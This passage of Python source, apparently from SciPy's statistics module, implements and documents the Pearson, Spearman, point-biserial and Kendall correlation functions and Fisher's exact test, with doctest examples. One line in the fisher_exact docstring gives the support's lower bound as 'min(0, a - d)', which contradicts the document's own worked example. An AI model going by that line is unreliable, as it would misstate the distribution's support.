parameters a and b approach a = b = 0 as a discrete distribution with
equal probability masses at r = 1 and r = -1. More directly, one
can observe that, given the data x = [x1, x2] and y = [y1, y2], and
assuming x1 != x2 and y1 != y2, the only possible values for r are 1
and -1. Because abs(r') for any sample x' and y' with length 2 will
be 1, the two-sided p-value for a sample of length 2 is always 1.
References
----------
.. [1] "Pearson correlation coefficient", Wikipedia,
https://en.wikipedia.org/wiki/Pearson_correlation_coefficient
.. [2] Student, "Probable error of a correlation coefficient",
Biometrika, Volume 6, Issue 2-3, 1 September 1908, pp. 302-310.
.. [3] C. J. Kowalski, "On the Effects of Non-Normality on the Distribution
of the Sample Product-Moment Correlation Coefficient"
Journal of the Royal Statistical Society. Series C (Applied
Statistics), Vol. 21, No. 1 (1972), pp. 1-12.
Examples
--------
>>> from scipy import stats
>>> stats.pearsonr([1, 2, 3, 4, 5], [10, 9, 2.5, 6, 4])
(-0.7426106572325057, 0.1505558088534455)
There is a linear dependence between x and y if y = a + b*x + e, where
a,b are constants and e is a random error term, assumed to be independent
of x. For simplicity, assume that x is standard normal, a=0, b=1 and let
e follow a normal distribution with mean zero and standard deviation s>0.
>>> s = 0.5
>>> x = stats.norm.rvs(size=500)
>>> e = stats.norm.rvs(scale=s, size=500)
>>> y = x + e
>>> stats.pearsonr(x, y)
(0.9029601878969703, 8.428978827629898e-185) # may vary
This should be close to the exact value given by
>>> 1/np.sqrt(1 + s**2)
0.8944271909999159
For s=0.5, we observe a high level of correlation. In general, a large
variance of the noise reduces the correlation, while the correlation
approaches one as the variance of the error goes to zero.
It is important to keep in mind that no correlation does not imply
independence unless (x, y) is jointly normal. Correlation can even be zero
    when there is a very simple dependence structure: if x follows a
    standard normal distribution, let y = abs(x). Note that the correlation
between x and y is zero. Indeed, since the expectation of x is zero,
cov(x, y) = E[x*y]. By definition, this equals E[x*abs(x)] which is zero
by symmetry. The following lines of code illustrate this observation:
>>> y = np.abs(x)
>>> stats.pearsonr(x, y)
(-0.016172891856853524, 0.7182823678751942) # may vary
    A non-zero correlation coefficient can be misleading. For example, if x has
a standard normal distribution, define y = x if x < 0 and y = 0 otherwise.
A simple calculation shows that corr(x, y) = sqrt(2/Pi) = 0.797...,
implying a high level of correlation:
>>> y = np.where(x < 0, x, 0)
>>> stats.pearsonr(x, y)
(0.8537091583771509, 3.183461621422181e-143) # may vary
    This is unintuitive since there is no dependence of x and y if x is larger
    than zero, which happens in about half of the cases if we sample x and y.
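    The p-value can be reproduced from the beta distribution given in the
    Notes (here for the first example above, with sample size ``n = 5``):
    >>> r, p = stats.pearsonr([1, 2, 3, 4, 5], [10, 9, 2.5, 6, 4])
    >>> n = 5
    >>> dist = stats.beta(n/2 - 1, n/2 - 1, loc=-1, scale=2)
    >>> np.allclose(p, 2*dist.cdf(-abs(r)))
    True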
"""
n = len(x)
if n != len(y):
raise ValueError('x and y must have the same length.')
if n < 2:
raise ValueError('x and y must have length at least 2.')
x = np.asarray(x)
y = np.asarray(y)
# If an input is constant, the correlation coefficient is not defined.
if (x == x[0]).all() or (y == y[0]).all():
warnings.warn(PearsonRConstantInputWarning())
return np.nan, np.nan
# dtype is the data type for the calculations. This expression ensures
# that the data type is at least 64 bit floating point. It might have
# more precision if the input is, for example, np.longdouble.
dtype = type(1.0 + x[0] + y[0])
if n == 2:
return dtype(np.sign(x[1] - x[0])*np.sign(y[1] - y[0])), 1.0
xmean = x.mean(dtype=dtype)
ymean = y.mean(dtype=dtype)
# By using `astype(dtype)`, we ensure that the intermediate calculations
# use at least 64 bit floating point.
xm = x.astype(dtype) - xmean
ym = y.astype(dtype) - ymean
# Unlike np.linalg.norm or the expression sqrt((xm*xm).sum()),
# scipy.linalg.norm(xm) does not overflow if xm is, for example,
# [-5e210, 5e210, 3e200, -3e200]
normxm = linalg.norm(xm)
normym = linalg.norm(ym)
threshold = 1e-13
if normxm < threshold*abs(xmean) or normym < threshold*abs(ymean):
# If all the values in x (likewise y) are very close to the mean,
# the loss of precision that occurs in the subtraction xm = x - xmean
# might result in large errors in r.
warnings.warn(PearsonRNearConstantInputWarning())
r = np.dot(xm/normxm, ym/normym)
# Presumably, if abs(r) > 1, then it is only some small artifact of
# floating point arithmetic.
r = max(min(r, 1.0), -1.0)
# As explained in the docstring, the p-value can be computed as
# p = 2*dist.cdf(-abs(r))
# where dist is the beta distribution on [-1, 1] with shape parameters
# a = b = n/2 - 1. `special.btdtr` is the CDF for the beta distribution
# on [0, 1]. To use it, we make the transformation x = (r + 1)/2; the
# shape parameters do not change. Then -abs(r) used in `cdf(-abs(r))`
# becomes x = (-abs(r) + 1)/2 = 0.5*(1 - abs(r)). (r is cast to float64
# to avoid a TypeError raised by btdtr when r is higher precision.)
ab = n/2 - 1
prob = 2*special.btdtr(ab, ab, 0.5*(1 - abs(np.float64(r))))
return r, prob
def fisher_exact(table, alternative='two-sided'):
"""Perform a Fisher exact test on a 2x2 contingency table.
Parameters
----------
table : array_like of ints
A 2x2 contingency table. Elements must be non-negative integers.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
See the Notes for more details.
Returns
-------
oddsratio : float
        This is the prior odds ratio, not a posterior estimate.
p_value : float
P-value, the probability of obtaining a distribution at least as
extreme as the one that was actually observed, assuming that the
null hypothesis is true.
See Also
--------
chi2_contingency : Chi-square test of independence of variables in a
contingency table. This can be used as an alternative to
`fisher_exact` when the numbers in the table are large.
    barnard_exact : Barnard's exact test, which is a more powerful alternative
        to Fisher's exact test for 2x2 contingency tables.
    boschloo_exact : Boschloo's exact test, which is a more powerful alternative
        to Fisher's exact test for 2x2 contingency tables.
Notes
-----
*Null hypothesis and p-values*
The null hypothesis is that the input table is from the hypergeometric
distribution with parameters (as used in `hypergeom`)
``M = a + b + c + d``, ``n = a + b`` and ``N = a + c``, where the
input table is ``[[a, b], [c, d]]``. This distribution has support
``max(0, N + n - M) <= x <= min(N, n)``, or, in terms of the values
in the input table, ``min(0, a - d) <= x <= a + min(b, c)``. ``x``
can be interpreted as the upper-left element of a 2x2 table, so the
tables in the distribution have form::
[ x n - x ]
[N - x M - (n + N) + x]
For example, if::
table = [6 2]
[1 4]
then the support is ``2 <= x <= 7``, and the tables in the distribution
are::
[2 6] [3 5] [4 4] [5 3] [6 2] [7 1]
[5 0] [4 1] [3 2] [2 3] [1 4] [0 5]
The probability of each table is given by the hypergeometric distribution
``hypergeom.pmf(x, M, n, N)``. For this example, these are (rounded to
three significant digits)::
x 2 3 4 5 6 7
p 0.0163 0.163 0.408 0.326 0.0816 0.00466
These can be computed with::
>>> from scipy.stats import hypergeom
>>> table = np.array([[6, 2], [1, 4]])
>>> M = table.sum()
>>> n = table[0].sum()
>>> N = table[:, 0].sum()
>>> start, end = hypergeom.support(M, n, N)
>>> hypergeom.pmf(np.arange(start, end+1), M, n, N)
array([0.01631702, 0.16317016, 0.40792541, 0.32634033, 0.08158508,
0.004662 ])
The two-sided p-value is the probability that, under the null hypothesis,
a random table would have a probability equal to or less than the
probability of the input table. For our example, the probability of
the input table (where ``x = 6``) is 0.0816. The x values where the
probability does not exceed this are 2, 6 and 7, so the two-sided p-value
is ``0.0163 + 0.0816 + 0.00466 ~= 0.10256``::
>>> from scipy.stats import fisher_exact
>>> oddsr, p = fisher_exact(table, alternative='two-sided')
>>> p
0.10256410256410257
The one-sided p-value for ``alternative='greater'`` is the probability
that a random table has ``x >= a``, which in our example is ``x >= 6``,
or ``0.0816 + 0.00466 ~= 0.08626``::
>>> oddsr, p = fisher_exact(table, alternative='greater')
>>> p
0.08624708624708627
This is equivalent to computing the survival function of the
distribution at ``x = 5`` (one less than ``x`` from the input table,
because we want to include the probability of ``x = 6`` in the sum)::
>>> hypergeom.sf(5, M, n, N)
0.08624708624708627
For ``alternative='less'``, the one-sided p-value is the probability
    that a random table has ``x <= a`` (i.e. ``x <= 6`` in our example),
or ``0.0163 + 0.163 + 0.408 + 0.326 + 0.0816 ~= 0.9949``::
>>> oddsr, p = fisher_exact(table, alternative='less')
>>> p
0.9953379953379957
This is equivalent to computing the cumulative distribution function
of the distribution at ``x = 6``:
>>> hypergeom.cdf(6, M, n, N)
0.9953379953379957
*Odds ratio*
The calculated odds ratio is different from the one R uses. This SciPy
implementation returns the (more common) "unconditional Maximum
Likelihood Estimate", while R uses the "conditional Maximum Likelihood
Estimate".
Examples
--------
Say we spend a few days counting whales and sharks in the Atlantic and
Indian oceans. In the Atlantic ocean we find 8 whales and 1 shark, in the
Indian ocean 2 whales and 5 sharks. Then our contingency table is::
Atlantic Indian
whales 8 2
sharks 1 5
We use this table to find the p-value:
>>> from scipy.stats import fisher_exact
>>> oddsratio, pvalue = fisher_exact([[8, 2], [1, 5]])
>>> pvalue
0.0349...
The probability that we would observe this or an even more imbalanced ratio
by chance is about 3.5%. A commonly used significance level is 5%--if we
adopt that, we can therefore conclude that our observed imbalance is
statistically significant; whales prefer the Atlantic while sharks prefer
the Indian ocean.
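    The returned odds ratio is the unconditional sample estimate described in
    the Notes, i.e. the cross ratio of the table entries:
    >>> oddsratio
    20.0
    >>> (8 * 5) / (2 * 1)
    20.0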
"""
hypergeom = distributions.hypergeom
# int32 is not enough for the algorithm
c = np.asarray(table, dtype=np.int64)
if not c.shape == (2, 2):
raise ValueError("The input `table` must be of shape (2, 2).")
if np.any(c < 0):
raise ValueError("All values in `table` must be nonnegative.")
if 0 in c.sum(axis=0) or 0 in c.sum(axis=1):
# If both values in a row or column are zero, the p-value is 1 and
# the odds ratio is NaN.
return np.nan, 1.0
if c[1, 0] > 0 and c[0, 1] > 0:
oddsratio = c[0, 0] * c[1, 1] / (c[1, 0] * c[0, 1])
else:
oddsratio = np.inf
n1 = c[0, 0] + c[0, 1]
n2 = c[1, 0] + c[1, 1]
n = c[0, 0] + c[1, 0]
def binary_search(n, n1, n2, side):
"""Binary search for where to begin halves in two-sided test."""
if side == "upper":
minval = mode
maxval = n
else:
minval = 0
maxval = mode
guess = -1
while maxval - minval > 1:
if maxval == minval + 1 and guess == minval:
guess = maxval
else:
guess = (maxval + minval) // 2
pguess = hypergeom.pmf(guess, n1 + n2, n1, n)
if side == "upper":
ng = guess - 1
else:
ng = guess + 1
if pguess <= pexact < hypergeom.pmf(ng, n1 + n2, n1, n):
break
elif pguess < pexact:
maxval = guess
else:
minval = guess
if guess == -1:
guess = minval
if side == "upper":
while guess > 0 and \
hypergeom.pmf(guess, n1 + n2, n1, n) < pexact * epsilon:
guess -= 1
while hypergeom.pmf(guess, n1 + n2, n1, n) > pexact / epsilon:
guess += 1
else:
while hypergeom.pmf(guess, n1 + n2, n1, n) < pexact * epsilon:
guess += 1
while guess > 0 and \
hypergeom.pmf(guess, n1 + n2, n1, n) > pexact / epsilon:
guess -= 1
return guess
if alternative == 'less':
pvalue = hypergeom.cdf(c[0, 0], n1 + n2, n1, n)
elif alternative == 'greater':
# Same formula as the 'less' case, but with the second column.
pvalue = hypergeom.cdf(c[0, 1], n1 + n2, n1, c[0, 1] + c[1, 1])
elif alternative == 'two-sided':
mode = int((n + 1) * (n1 + 1) / (n1 + n2 + 2))
pexact = hypergeom.pmf(c[0, 0], n1 + n2, n1, n)
pmode = hypergeom.pmf(mode, n1 + n2, n1, n)
epsilon = 1 - 1e-4
if np.abs(pexact - pmode) / np.maximum(pexact, pmode) <= 1 - epsilon:
return oddsratio, 1.
elif c[0, 0] < mode:
plower = hypergeom.cdf(c[0, 0], n1 + n2, n1, n)
if hypergeom.pmf(n, n1 + n2, n1, n) > pexact / epsilon:
return oddsratio, plower
guess = binary_search(n, n1, n2, "upper")
pvalue = plower + hypergeom.sf(guess - 1, n1 + n2, n1, n)
else:
pupper = hypergeom.sf(c[0, 0] - 1, n1 + n2, n1, n)
if hypergeom.pmf(0, n1 + n2, n1, n) > pexact / epsilon:
return oddsratio, pupper
guess = binary_search(n, n1, n2, "lower")
pvalue = pupper + hypergeom.cdf(guess, n1 + n2, n1, n)
else:
msg = "`alternative` should be one of {'two-sided', 'less', 'greater'}"
raise ValueError(msg)
pvalue = min(pvalue, 1.0)
return oddsratio, pvalue
class SpearmanRConstantInputWarning(RuntimeWarning):
"""Warning generated by `spearmanr` when an input is constant."""
def __init__(self, msg=None):
if msg is None:
msg = ("An input array is constant; the correlation coefficient "
"is not defined.")
self.args = (msg,)
SpearmanrResult = namedtuple('SpearmanrResult', ('correlation', 'pvalue'))
def spearmanr(a, b=None, axis=0, nan_policy='propagate',
alternative='two-sided'):
"""Calculate a Spearman correlation coefficient with associated p-value.
The Spearman rank-order correlation coefficient is a nonparametric measure
of the monotonicity of the relationship between two datasets. Unlike the
Pearson correlation, the Spearman correlation does not assume that both
datasets are normally distributed. Like other correlation coefficients,
this one varies between -1 and +1 with 0 implying no correlation.
Correlations of -1 or +1 imply an exact monotonic relationship. Positive
correlations imply that as x increases, so does y. Negative correlations
imply that as x increases, y decreases.
The p-value roughly indicates the probability of an uncorrelated system
producing datasets that have a Spearman correlation at least as extreme
as the one computed from these datasets. The p-values are not entirely
reliable but are probably reasonable for datasets larger than 500 or so.
Parameters
----------
a, b : 1D or 2D array_like, b is optional
One or two 1-D or 2-D arrays containing multiple variables and
observations. When these are 1-D, each represents a vector of
observations of a single variable. For the behavior in the 2-D case,
see under ``axis``, below.
Both arrays need to have the same length in the ``axis`` dimension.
axis : int or None, optional
If axis=0 (default), then each column represents a variable, with
observations in the rows. If axis=1, the relationship is transposed:
each row represents a variable, while the columns contain observations.
If axis=None, then both arrays will be raveled.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis. Default is 'two-sided'.
The following options are available:
* 'two-sided': the correlation is nonzero
* 'less': the correlation is negative (less than zero)
* 'greater': the correlation is positive (greater than zero)
.. versionadded:: 1.7.0
Returns
-------
correlation : float or ndarray (2-D square)
        Spearman correlation matrix or correlation coefficient (if only 2
        variables are given as parameters). The correlation matrix is square
        with length equal to the total number of variables (columns or rows)
        in ``a`` and ``b`` combined.
pvalue : float
        The p-value for a hypothesis test whose null hypothesis
is that two sets of data are uncorrelated. See `alternative` above
for alternative hypotheses. `pvalue` has the same
shape as `correlation`.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Section 14.7
Examples
--------
>>> from scipy import stats
>>> stats.spearmanr([1,2,3,4,5], [5,6,7,8,7])
SpearmanrResult(correlation=0.82078..., pvalue=0.08858...)
>>> rng = np.random.default_rng()
>>> x2n = rng.standard_normal((100, 2))
>>> y2n = rng.standard_normal((100, 2))
>>> stats.spearmanr(x2n)
SpearmanrResult(correlation=-0.07960396039603959, pvalue=0.4311168705769747)
>>> stats.spearmanr(x2n[:,0], x2n[:,1])
SpearmanrResult(correlation=-0.07960396039603959, pvalue=0.4311168705769747)
>>> rho, pval = stats.spearmanr(x2n, y2n)
>>> rho
array([[ 1. , -0.07960396, -0.08314431, 0.09662166],
[-0.07960396, 1. , -0.14448245, 0.16738074],
[-0.08314431, -0.14448245, 1. , 0.03234323],
[ 0.09662166, 0.16738074, 0.03234323, 1. ]])
>>> pval
array([[0. , 0.43111687, 0.41084066, 0.33891628],
[0.43111687, 0. , 0.15151618, 0.09600687],
[0.41084066, 0.15151618, 0. , 0.74938561],
[0.33891628, 0.09600687, 0.74938561, 0. ]])
>>> rho, pval = stats.spearmanr(x2n.T, y2n.T, axis=1)
>>> rho
array([[ 1. , -0.07960396, -0.08314431, 0.09662166],
[-0.07960396, 1. , -0.14448245, 0.16738074],
[-0.08314431, -0.14448245, 1. , 0.03234323],
[ 0.09662166, 0.16738074, 0.03234323, 1. ]])
>>> stats.spearmanr(x2n, y2n, axis=None)
SpearmanrResult(correlation=0.044981624540613524, pvalue=0.5270803651336189)
>>> stats.spearmanr(x2n.ravel(), y2n.ravel())
SpearmanrResult(correlation=0.044981624540613524, pvalue=0.5270803651336189)
>>> rng = np.random.default_rng()
>>> xint = rng.integers(10, size=(100, 2))
>>> stats.spearmanr(xint)
SpearmanrResult(correlation=0.09800224850707953, pvalue=0.3320271757932076)
"""
if axis is not None and axis > 1:
raise ValueError("spearmanr only handles 1-D or 2-D arrays, "
"supplied axis argument {}, please use only "
"values 0, 1 or None for axis".format(axis))
a, axisout = _chk_asarray(a, axis)
if a.ndim > 2:
raise ValueError("spearmanr only handles 1-D or 2-D arrays")
if b is None:
if a.ndim < 2:
raise ValueError("`spearmanr` needs at least 2 "
"variables to compare")
else:
# Concatenate a and b, so that we now only have to handle the case
# of a 2-D `a`.
b, _ = _chk_asarray(b, axis)
if axisout == 0:
a = np.column_stack((a, b))
else:
a = np.row_stack((a, b))
n_vars = a.shape[1 - axisout]
n_obs = a.shape[axisout]
if n_obs <= 1:
# Handle empty arrays or single observations.
return SpearmanrResult(np.nan, np.nan)
if axisout == 0:
if (a[:, 0][0] == a[:, 0]).all() or (a[:, 1][0] == a[:, 1]).all():
# If an input is constant, the correlation coefficient
# is not defined.
warnings.warn(SpearmanRConstantInputWarning())
return SpearmanrResult(np.nan, np.nan)
else: # case when axisout == 1 b/c a is 2 dim only
if (a[0, :][0] == a[0, :]).all() or (a[1, :][0] == a[1, :]).all():
# If an input is constant, the correlation coefficient
# is not defined.
warnings.warn(SpearmanRConstantInputWarning())
return SpearmanrResult(np.nan, np.nan)
a_contains_nan, nan_policy = _contains_nan(a, nan_policy)
variable_has_nan = np.zeros(n_vars, dtype=bool)
if a_contains_nan:
if nan_policy == 'omit':
return mstats_basic.spearmanr(a, axis=axis, nan_policy=nan_policy,
alternative=alternative)
elif nan_policy == 'propagate':
if a.ndim == 1 or n_vars <= 2:
return SpearmanrResult(np.nan, np.nan)
else:
# Keep track of variables with NaNs, set the outputs to NaN
# only for those variables
variable_has_nan = np.isnan(a).any(axis=axisout)
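    # Spearman's rho is the Pearson correlation of the ranks, so rank each
    # variable along `axisout` and take the ordinary correlation matrix.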
a_ranked = np.apply_along_axis(rankdata, axisout, a)
rs = np.corrcoef(a_ranked, rowvar=axisout)
dof = n_obs - 2 # degrees of freedom
# rs can have elements equal to 1, so avoid zero division warnings
with np.errstate(divide='ignore'):
# clip the small negative values possibly caused by rounding
# errors before taking the square root
t = rs * np.sqrt((dof/((rs+1.0)*(1.0-rs))).clip(0))
t, prob = _ttest_finish(dof, t, alternative)
# For backwards compatibility, return scalars when comparing 2 columns
if rs.shape == (2, 2):
return SpearmanrResult(rs[1, 0], prob[1, 0])
else:
rs[variable_has_nan, :] = np.nan
rs[:, variable_has_nan] = np.nan
return SpearmanrResult(rs, prob)
PointbiserialrResult = namedtuple('PointbiserialrResult',
('correlation', 'pvalue'))
def pointbiserialr(x, y):
r"""Calculate a point biserial correlation coefficient and its p-value.
The point biserial correlation is used to measure the relationship
between a binary variable, x, and a continuous variable, y. Like other
correlation coefficients, this one varies between -1 and +1 with 0
implying no correlation. Correlations of -1 or +1 imply a determinative
relationship.
This function uses a shortcut formula but produces the same result as
`pearsonr`.
Parameters
----------
x : array_like of bools
Input array.
y : array_like
Input array.
Returns
-------
correlation : float
R value.
pvalue : float
Two-sided p-value.
Notes
-----
    `pointbiserialr` uses a t-test with ``n-2`` degrees of freedom.
It is equivalent to `pearsonr`.
The value of the point-biserial correlation can be calculated from:
.. math::
        r_{pb} = \frac{\overline{Y_{1}} -
                       \overline{Y_{0}}}{s_{y}}\sqrt{\frac{N_{0} N_{1}}{N (N - 1)}}
Where :math:`Y_{0}` and :math:`Y_{1}` are means of the metric
observations coded 0 and 1 respectively; :math:`N_{0}` and :math:`N_{1}`
are number of observations coded 0 and 1 respectively; :math:`N` is the
total number of observations and :math:`s_{y}` is the standard
deviation of all the metric observations.
A value of :math:`r_{pb}` that is significantly different from zero is
completely equivalent to a significant difference in means between the two
    groups. Thus, an independent groups t-test with :math:`N-2` degrees of
freedom may be used to test whether :math:`r_{pb}` is nonzero. The
relation between the t-statistic for comparing two independent groups and
:math:`r_{pb}` is given by:
.. math::
t = \sqrt{N - 2}\frac{r_{pb}}{\sqrt{1 - r^{2}_{pb}}}
References
----------
.. [1] J. Lev, "The Point Biserial Coefficient of Correlation", Ann. Math.
Statist., Vol. 20, no.1, pp. 125-126, 1949.
.. [2] R.F. Tate, "Correlation Between a Discrete and a Continuous
Variable. Point-Biserial Correlation.", Ann. Math. Statist., Vol. 25,
np. 3, pp. 603-607, 1954.
.. [3] D. Kornbrot "Point Biserial Correlation", In Wiley StatsRef:
Statistics Reference Online (eds N. Balakrishnan, et al.), 2014.
:doi:`10.1002/9781118445112.stat06227`
Examples
--------
>>> from scipy import stats
>>> a = np.array([0, 0, 0, 1, 1, 1, 1])
>>> b = np.arange(7)
>>> stats.pointbiserialr(a, b)
(0.8660254037844386, 0.011724811003954652)
>>> stats.pearsonr(a, b)
(0.86602540378443871, 0.011724811003954626)
>>> np.corrcoef(a, b)
array([[ 1. , 0.8660254],
[ 0.8660254, 1. ]])
"""
rpb, prob = pearsonr(x, y)
return PointbiserialrResult(rpb, prob)
KendalltauResult = namedtuple('KendalltauResult', ('correlation', 'pvalue'))
def kendalltau(x, y, initial_lexsort=None, nan_policy='propagate',
method='auto', variant='b', alternative='two-sided'):
"""Calculate Kendall's tau, a correlation measure for ordinal data.
Kendall's tau is a measure of the correspondence between two rankings.
Values close to 1 indicate strong agreement, and values close to -1
indicate strong disagreement. This implements two variants of Kendall's
tau: tau-b (the default) and tau-c (also known as Stuart's tau-c). These
differ only in how they are normalized to lie within the range -1 to 1;
the hypothesis tests (their p-values) are identical. Kendall's original
tau-a is not implemented separately because both tau-b and tau-c reduce
to tau-a in the absence of ties.
Parameters
----------
x, y : array_like
Arrays of rankings, of the same shape. If arrays are not 1-D, they
will be flattened to 1-D.
initial_lexsort : bool, optional
Unused (deprecated).
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
method : {'auto', 'asymptotic', 'exact'}, optional
Defines which method is used to calculate the p-value [5]_.
The following options are available (default is 'auto'):
* 'auto': selects the appropriate method based on a trade-off
between speed and accuracy
* 'asymptotic': uses a normal approximation valid for large samples
* 'exact': computes the exact p-value, but can only be used if no ties
are present. As the sample size increases, the 'exact' computation
time may grow and the result may lose some precision.
variant : {'b', 'c'}, optional
Defines which variant of Kendall's tau is returned. Default is 'b'.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis. Default is 'two-sided'.
The following options are available:
* 'two-sided': the rank correlation is nonzero
* 'less': the rank correlation is negative (less than zero)
* 'greater': the rank correlation is positive (greater than zero)
Returns
-------
correlation : float
The tau statistic.
pvalue : float
The p-value for a hypothesis test whose null hypothesis is
an absence of association, tau = 0.
See Also
--------
spearmanr : Calculates a Spearman rank-order correlation coefficient.
theilslopes : Computes the Theil-Sen estimator for a set of points (x, y).
weightedtau : Computes a weighted version of Kendall's tau.
Notes
-----
The definition of Kendall's tau that is used is [2]_::
tau_b = (P - Q) / sqrt((P + Q + T) * (P + Q + U))
tau_c = 2 (P - Q) / (n**2 * (m - 1) / m)
where P is the number of concordant pairs, Q the number of discordant
pairs, T the number of ties only in `x`, and U the number of ties only in
`y`. If a tie occurs for the same pair in both `x` and `y`, it is not
added to either T or U. n is the total number of samples, and m is the
number of unique values in either `x` or `y`, whichever is smaller.
References
----------
.. [1] Maurice G. Kendall, "A New Measure of Rank Correlation", Biometrika
Vol. 30, No. 1/2, pp. 81-93, 1938.
.. [2] Maurice G. Kendall, "The treatment of ties in ranking problems",
Biometrika Vol. 33, No. 3, pp. 239-251. 1945.
.. [3] Gottfried E. Noether, "Elements of Nonparametric Statistics", John
Wiley & Sons, 1967.
.. [4] Peter M. Fenwick, "A new data structure for cumulative frequency
tables", Software: Practice and Experience, Vol. 24, No. 3,
pp. 327-336, 1994.
.. [5] Maurice G. Kendall, "Rank Correlation Methods" (4th Edition),
Charles Griffin & Co., 1970.
Examples
--------
>>> from scipy import stats
>>> x1 = [12, 2, 1, 12, 2]
>>> x2 = [1, 4, 7, 1, 0]
>>> tau, p_value = stats.kendalltau(x1, x2)
>>> tau
-0.47140452079103173
>>> p_value
0.2827454599327748
"""
x = np.asarray(x).ravel()
y = np.asarray(y).ravel()
if x.size != y.size:
raise ValueError("All inputs to `kendalltau` must be of the same "
f"size, found x-size {x.size} and y-size {y.size}")
elif not x.size or not y.size:
# Return NaN if arrays are empty
return KendalltauResult(np.nan, np.nan)
# check both x and y
cnx, npx = _contains_nan(x, nan_policy)
cny, npy = _contains_nan(y, nan_policy)
contains_nan = cnx or cny
if npx == 'omit' or npy == 'omit':
nan_policy = 'omit'
if contains_nan and nan_policy == 'propagate':
return KendalltauResult(np.nan, np.nan)
elif contains_nan and nan_policy == 'omit':
x = ma.masked_invalid(x)
y = ma.masked_invalid(y)
if variant == 'b':
return mstats_basic.kendalltau(x, y, method=method, use_ties=True,
alternative=alternative)
else:
message = ("nan_policy='omit' is currently compatible only with "
"variant='b'.")
raise ValueError(message)
if initial_lexsort is not None: # deprecate to drop!
warnings.warn('"initial_lexsort" is gone!')
def count_rank_tie(ranks):
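        # `cnt` holds the multiplicities of tied values; the three sums are
        # the tie statistics sum t*(t-1)/2, sum t*(t-1)*(t-2) and
        # sum t*(t-1)*(2*t+5) used for tau-b and the asymptotic variance.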
cnt = np.bincount(ranks).astype('int64', copy=False)
cnt = cnt[cnt > 1]
return ((cnt * (cnt - 1) // 2).sum(),
(cnt * (cnt - 1.) * (cnt - 2)).sum(),
(cnt * (cnt - 1.) * (2*cnt + 5)).sum())
size = x.size
perm = np.argsort(y) # sort on y and convert y to dense ranks
x, y = x[perm], y[perm]
y = np.r_[True, y[1:] != y[:-1]].cumsum(dtype=np.intp)
# stable sort on x and convert x to dense ranks
perm = np.argsort(x, kind='mergesort')
x, y = x[perm], y[perm]
x = np.r_[True, x[1:] != x[:-1]].cumsum(dtype=np.intp)
dis = _kendall_dis(x, y) # discordant pairs
obs = np.r_[True, (x[1:] != x[:-1]) | (y[1:] != y[:-1]), True]
cnt = np.diff(np.nonzero(obs)[0]).astype('int64', copy=False)
ntie = (cnt * (cnt - 1) // 2).sum() # joint ties
xtie, x0, x1 = count_rank_tie(x) # ties in x, stats
ytie, y0, y1 = count_rank_tie(y) # ties in y, stats
tot = (size * (size - 1)) // 2
if xtie == tot or ytie == tot:
return KendalltauResult(np.nan, np.nan)
# Note that tot = con + dis + (xtie - ntie) + (ytie - ntie) + ntie
# = con + dis + xtie + ytie - ntie
con_minus_dis = tot - xtie - ytie + ntie - 2 * dis
if variant == 'b':
tau = con_minus_dis / np.sqrt(tot - xtie) / np.sqrt(tot - ytie)
elif variant == 'c':
minclasses = min(len(set(x)), len(set(y)))
tau = 2*con_minus_dis / (size**2 * (minclasses-1)/minclasses)
else:
raise ValueError(f"Unknown variant of the method chosen: {variant}. "
"variant must be 'b' or 'c'.")
# Limit range to fix computational errors
tau = min(1., max(-1., tau))
# The p-value calculation is the same for all variants since the p-value
# depends only on con_minus_dis.
if method == 'exact' and (xtie != 0 or ytie != 0):
raise ValueError("Ties found, exact method cannot be used.")
if method == 'auto':
if (xtie == 0 and ytie == 0) and (size <= 33 or
min(dis, tot-dis) <= 1):
method = 'exact'
else:
method = 'asymptotic'
if xtie == 0 and ytie == 0 and method == 'exact':
pvalue = mstats_basic._kendall_p_exact(size, tot-dis, alternative)
elif method == 'asymptotic':
# con_minus_dis is approx normally distributed with this variance [3]_
m = size * (size - 1.)
var = ((m * (2*size + 5) - x1 - y1) / 18 +
(2 * xtie * ytie) / m + x0 * y0 / (9 * m * (size - 2)))
z = con_minus_dis / np.sqrt(var)
_, pvalue = _normtest_finish(z, alternative)
else:
raise ValueError(f"Unknown method {method} specified. Use 'auto', "
"'exact' or 'asymptotic'.")
return KendalltauResult(tau, pvalue)
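# A minimal O(n**2) reference implementation of the tau-b formula used above,
# kept only as an illustrative sketch: `_kendall_tau_b_naive` is a hypothetical
# name, it is not part of the public API, and the O(n log n) path in
# `kendalltau` should be preferred. It can serve as a sanity check on small
# inputs.
def _kendall_tau_b_naive(x, y):
    x = np.asarray(x, dtype=float).ravel()
    y = np.asarray(y, dtype=float).ravel()
    n = x.size
    con = dis = xtie = ytie = 0
    for i in range(n):
        for j in range(i + 1, n):
            dx, dy = x[i] - x[j], y[i] - y[j]
            if dx == 0:
                xtie += 1
            if dy == 0:
                ytie += 1
            if dx != 0 and dy != 0:
                if dx * dy > 0:
                    con += 1
                else:
                    dis += 1
    tot = n * (n - 1) // 2
    if xtie == tot or ytie == tot:
        return np.nan
    # tau-b normalizes con - dis by the numbers of pairs not tied in x
    # and not tied in y, respectively
    return (con - dis) / np.sqrt(tot - xtie) / np.sqrt(tot - ytie)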
WeightedTauResult = namedtuple('WeightedTauResult', ('correlation', 'pvalue'))
def weightedtau(x, y, rank=True, weigher=None, additive=True):
r"""Compute a weighted version of Kendall's :math:`\tau`.
The weighted :math:`\tau` is a weighted version of Kendall's
:math:`\tau` in which exchanges of high weight are more influential than
exchanges of low weight. The default parameters compute the additive
hyperbolic version of the index, :math:`\tau_\mathrm h`, which has
been shown to provide the best balance between important and
unimportant elements [1]_.
The weighting is defined by means of a rank array, which assigns a
nonnegative rank to each element (higher importance ranks being
associated with smaller values, e.g., 0 is the highest possible rank),
and a weigher function, which assigns a weight based on the rank to
each element. The weight of an exchange is then the sum or the product
of the weights of the ranks of the exchanged elements. The default
